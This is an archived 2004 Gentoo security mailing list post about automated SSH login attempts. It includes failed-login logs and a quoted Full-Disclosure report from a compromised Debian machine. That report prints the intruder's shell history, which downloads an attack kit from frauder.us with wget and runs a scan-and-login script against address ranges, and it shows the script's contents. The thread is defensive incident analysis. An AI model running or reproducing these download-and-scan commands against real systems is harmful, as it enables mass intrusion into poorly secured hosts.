Gentoo Archives: gentoo-security

From: Jan Dusek <j.d@×××××××××.cz>
To: gentoo-security@l.g.o
Subject: Re: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?]
Date: Fri, 30 Jul 2004 07:38:10
Message-Id: 4109FABF.4010207@most.ujep.cz
In Reply to: Re: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?] by Rui Pedro Figueira Covelo
1 That certainly is a good point. On the other hand I have this in the log
2 of one of my machines:
3
4 Jul 27 2004 14:38 GMT:
5
6 Failed password for illegal user test from 220.80.108.73 port 60972 ssh2
7 Failed password for root from 220.80.108.73 port 60902 ssh2
8 Failed password for root from 220.80.108.73 port 60825 ssh2
9 Failed password for root from 220.80.108.73 port 60742 ssh2
10 Failed password for illegal user user from 220.80.108.73 port 60670 ssh2
11 Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2
12 Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2
13 Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2
14 Failed password for illegal user test from 220.80.108.73 port 60339 ssh2
15
16
17 Jul 20 2004 16:20 GMT:
18
19 Failed password for illegal user test from 131.234.157.10 port 37301 ssh2
20 Failed password for root from 131.234.157.10 port 37284 ssh2
21 Failed password for root from 131.234.157.10 port 37253 ssh2
22 Failed password for root from 131.234.157.10 port 37267 ssh2
23 Failed password for illegal user admin from 131.234.157.10 port 37210 ssh2
24 Failed password for illegal user admin from 131.234.157.10 port 37191 ssh2
25 Failed password for illegal user user from 131.234.157.10 port 37229 ssh2
26 Failed password for illegal user test from 131.234.157.10 port 37133 ssh2
27 Failed password for illegal user guest from 131.234.157.10 port 37164 ssh2
28
29
30 And something simillar on Jul 20 2004 01:10 GMT from 66.250.111.33.
31
32 I'm wondering if it has anything to do with these ssh probes. I'm
33 getting the 'guest and test' probes as well, but far more recently
34 (starting Jul 28).
35
36 Please note that there are root attempts as well in the logs. Also
37 please note that there are everytime 2 admin, 3 root, 2 test, 1 user and
38 1 guest attempts, so it looks like a simple dictionary attack with some
39 basic empty/weak passwords.
40
41 It's just a wild guess but could it be that there are 2 stages of this
42 'thing'?
43
44 Hope it helps...
45
46 --jd
47
48 Rui Pedro Figueira Covelo wrote:
49 > I noticed that the .bash_history it's from the root account. Not guest
50 > or test. If this .bash_history is real, the fact that someone got root
51 > proves that someone used an exploit rather than guessing a weak password
52 > of a guest or test account, right?
53 >
54 >
55 >
56 >
57 >
58 > Dan Margolis wrote:
59 > | I grabbed the tgz before it's too late. I plan on running it with a
60 > | sniffer so I can see what it's doing--that should indicate whether it's
61 > | really using some unknown ssh exploit (I'm afraid I'm not a whiz at
62 > | disassembly, so I'd rather not take that route). I tend to think it's
63 > | not; there was an OpenSSH vuln a while back that this guy's Debian
64 > | machine might still be vulnerable to, if it wasn't patched in a year. If
65 > | there were an unknown vulnerability, he'd be having a lot more success
66 > | and we'd be seeing this a whole lot more (unless we're all rooted and
67 > | don't know it).
68 > |
69 > | Anyone have any more information on this?
70 > |
71 > | -------- Original Message --------
72 > |
73 > | From: Stefan Janecek <stefan.janecek@×××.at>
74 > | To: full-disclosure@××××××××××××.com
75 > |
76 > |
77 > | Hmmm - I have also been getting those login attemps, but thought them to
78 > | be harmless. Maybe they are not *that* harmless, though... Today I
79 > | managed to get my hands on a machine that was originating such login
80 > | attempts. I must admit I am far from being a linux security expert, but
81 > | this is what I've found out up to now:
82 > |
83 > | Whoever broke into the machine did not take any attempts to cover up his
84 > | tracks - this is what I found in /root/.bash_history:
85 > |
86 > | ------
87 > | id
88 > | uname -a
89 > | w
90 > | id
91 > | ls
92 > | wgte frauder.us/linux/ssh.tgz
93 > | wget frauder.us/linux/ssh.tgz
94 > | tar xzvf ssh.tgz
95 > | tar xvf ssh.tgz
96 > | ls
97 > | cd ssh
98 > | ls
99 > | ./go.sh 195.178
100 > | ls
101 > | pico uniq.txt
102 > | vi uniq.txt
103 > | ls
104 > | rm -rf uniq.txt
105 > | ./go.sh 167.205
106 > | ls
107 > | rm -rf uniq.txt vuln.txt
108 > | ./go.sh 202.148.20
109 > | ./go.sh 212.92
110 > | ./go.sh 195.197
111 > | ./go.sh 147.32
112 > | ./go.sh 213.168
113 > | ./go.sh 134.176
114 > | ./go.sh 195.83
115 > | ------
116 > |
117 > | um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
118 > | binaries:
119 > |
120 > | go.sh:
121 > | -------
122 > | ./ss 22 -b $1 -i eth0 -s 6
123 > | cat bios.txt |sort | uniq > uniq.txt
124 > | ./sshf
125 > | -------
126 > |
127 > | * 'ss' apparently is some sort of portscanner
128 > | * 'sshf' connects to every IP in uniq.txt and tries to log in as user
129 > | 'test' first, then as user 'guest' (according to tcpdump).
130 > |
131 > | This does not seem to be a stupid brute force attack, as there is only
132 > | one login attempt per user. Could it be that the tool tries to exploit
133 > | some vulnerability in the sshd, and just tries to look harmless by using
134 > | 'test' and 'guest' as usernames?
135 > |
136 > | The compromised machine was running an old debian woody installation
137 > | which had not been upgraded for at least one year, the sshd version
138 > | string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
139 > |
140 > | As already mentioned, I am far from being an expert, but if I can assist
141 > | in further testing, then let me know. Please CC me, I am not subscribed
142 > | to the list.
143 > |
144 > | cheers,
145 > | Stefan
146 > |
147 > |
148 > |
149 > |
150 > |
151 > |
152 > | _______________________________________________
153 > | Full-Disclosure - We believe in it.
154 > | Charter: http://lists.netsys.com/full-disclosure-charter.html
155 > |
156 > |
157 > | --
158 > | Dan ("KrispyKringle")
159 > | Gentoo Linux Security Coordinator
160 >
161 > --
162 > gentoo-security@g.o mailing list
163 >
164 >
165
166 --
167 gentoo-security@g.o mailing list
168
169
170 --
171 gentoo-security@g.o mailing list